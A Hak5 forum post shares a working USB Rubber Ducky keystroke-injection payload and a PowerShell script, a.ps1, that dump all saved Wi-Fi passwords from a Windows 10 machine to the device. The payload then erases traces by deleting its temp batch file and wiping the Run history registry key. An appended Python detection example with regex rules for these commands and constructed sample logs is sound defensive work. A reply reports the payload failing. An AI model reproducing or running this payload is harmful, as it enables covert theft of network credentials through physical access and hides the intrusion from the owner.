Hak5 Forums
audie2180

Get Wifi passwords from Windows 10 - Twin Ducky 2.1


My first script using the Ducky... 

Begged, stole and borrowed from other people's code and amended it to get to what I wanted. Most of the code is from Darren Kitchen's 15 second password hack, for the bits around how to use Twin Ducky and how to keep, use and save files whilst mounting the Ducky as a USB storage device... It's not perfect but hits the mark for what I currently need. To summarise:

* It creates a .BAT file in %TEMP% which finds the assigned drive of the DUCKY

* It then uses the Select-String cmdlet to get the password for the wireless networks on the target machine

* Saves this (albeit slightly messily) to Output.txt on the Ducky 

* Finally gets rid of the TEMP file and history in the run command window

Look forward to comments and anything anyone can suggest to speed this up and make it better. 

Cheers 

Audie

 

Ducky Script

REM Author: Audie2180
REM Ducky WIFI credential plain text password report: 1.0
REM Target: Windows 10
REM Firmware: Twin Duck 2.1
REM Description: Runs Powershell to get wifi password using ConvertFrom-String, saves to notepad, saves to Ducky, Clears up tracks
DELAY 1000

REM ----Open cmd as administrator

GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM ----Change directories because System32 appears to be protected. 
STRING CD %TEMP%
ENTER

REM ----Make batch file that waits for SD card to mount. 
REM ----Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( 
ENTER
STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do (
ENTER
STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" )
ENTER
STRING )
ENTER
STRING )
ENTER
STRING if Exist %DuckyDrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM ----Continue script
STRING Powershell %DuckyDrive%\a.ps1 > %DuckyDrive%\Output.txt
ENTER
CONTROL z
ENTER
REM --- Close CMD
DELAY 500
ALT F4
DELAY 500

REM ---- Run BAT file 
DELAY 1000
GUI r
DELAY 500
STRING %TEMP%/DuckyWait.bat
DELAY 500
ENTER
DELAY 800

REM ----Open cmd as administrator

GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM --- Clean up, close CMD, delete tmp files, remove command prompt hist
REM --- Cleanup file created
DELAY 500
STRING del /f %TEMP%\DuckyWait.bat
ENTER

REM ----Clear the Run history and exit
DELAY 500
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
STRING exit

REM --- Close CMD
DELAY 500
ALT F4
DELAY 500

REM ---- Flash CAPSLOCK
CAPSLOCK
DELAY 500
CAPSLOCK
DELAY 500
CAPSLOCK
DELAY 500
CAPSLOCK

... which obviously needs to be compiled as an inject.bin, but also needs the following Powershell file...

a.ps1 

#Make a list with all WiFi SSID's and passwords stored locally on Windows OS.

$output = netsh.exe wlan show profiles
$profileRows = $output | Select-String -Pattern 'All User Profile'
$profileNames = New-Object System.Collections.ArrayList

#for each profile name get the SSID and password
for($i = 0; $i -lt $profileRows.Count; $i++){
    $profileName = ($profileRows[$i] -split ":")[-1].Trim()
    
    $profileOutput = netsh.exe wlan show profiles name="$profileName" key=clear
    
    $SSIDSearchResult = $profileOutput| Select-String -Pattern 'SSID Name'
    $profileSSID = ($SSIDSearchResult -split ":")[-1].Trim() -replace '"'

    $passwordSearchResult = $profileOutput| Select-String -Pattern 'Key Content'
    if($passwordSearchResult){
        $profilePw = ($passwordSearchResult -split ":")[-1].Trim()
    } else {
        $profilePw = ''
    }
    
    $networkObject = New-Object -TypeName psobject -Property @{
        ProfileName = $profileName
        SSID = $profileSSID
        Password = $profilePw
    }
    $profileNames.Add($networkObject)
}

$profileNames | Sort-Object ProfileName | Select-Object ProfileName, SSID, Password
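
Added detection example, not part of the original post: the payload above leaves a distinctive process-creation trail (a console launched with /T:7F /F:OFF /V:ON, then netsh wlan show profiles ... key=clear, then a PowerShell wipe of the RunMRU key). It assumes command-line auditing is enabled (Security event 4688 with process command line, or Sysmon event 1) and that events have been normalised to the dict fields used below; the host, timestamps and command lines in SAMPLE are constructed, not real logs.

```python
import re
from datetime import datetime, timedelta

# Each rule: (name, process-name pattern, command-line pattern); matched case-insensitively.
RULES = [
    ("wifi_key_disclosure", r"netsh(\.exe)?$", r"wlan\s+show\s+profiles?\b.*key\s*=\s*clear"),
    ("runmru_wipe", r"powershell(\.exe)?$", r"Remove-ItemProperty.*\\RunMRU"),
    ("cmd_hidden_console", r"cmd(\.exe)?$", r"/T:7F\b.*/F:OFF\b.*/V:ON\b"),
]

def match_rules(event):
    """Return the names of every rule that fires on one process-creation event."""
    hits = []
    for name, proc_re, cmd_re in RULES:
        if re.search(proc_re, event["process"], re.I) and re.search(cmd_re, event["cmdline"], re.I):
            hits.append(name)
    return hits

def detect(events, window=timedelta(minutes=5)):
    """Tag each event with its rule hits, then rate a host 'high' when key disclosure
    and run-history wiping both occur within `window` of each other, else 'medium'."""
    tagged = [(e, match_rules(e)) for e in events]
    by_host = {}
    for e, hits in tagged:
        for h in hits:
            by_host.setdefault(e["host"], []).append((h, e["time"]))
    verdicts = {}
    for host, hits in by_host.items():
        disclosure = [t for h, t in hits if h == "wifi_key_disclosure"]
        wipe = [t for h, t in hits if h == "runmru_wipe"]
        close = any(abs(w - d) <= window for d in disclosure for w in wipe)
        verdicts[host] = "high" if close else "medium"
    return tagged, verdicts

# Constructed sample events (hypothetical host names and times) shaped like the payload's activity.
T = datetime(2020, 1, 1, 12, 0, 0)
SAMPLE = [
    {"time": T, "host": "PC1", "process": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /Q /D /T:7F /F:OFF /V:ON /K"},
    {"time": T + timedelta(seconds=40), "host": "PC1", "process": r"C:\Windows\System32\netsh.exe",
     "cmdline": 'netsh.exe wlan show profiles name="HomeNet" key=clear'},
    {"time": T + timedelta(seconds=50), "host": "PC1",
     "process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell \"Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*'\""},
    {"time": T + timedelta(hours=2), "host": "PC2", "process": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh wlan show profiles"},  # benign listing without key=clear: no hit
]

if __name__ == "__main__":
    tagged, verdicts = detect(SAMPLE)
    for e, hits in tagged:
        if hits:
            print(e["host"], e["time"].time(), hits)
    print(verdicts)
```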

 


Audie2180, did you just copy the .ps1 to the ducky and then call it with the inject.bin compile? I don't see the file ever execute in the %TEMP% directory. I know there is a cleanup but I am not getting an output.txt on the ducky. Thank you, great info.

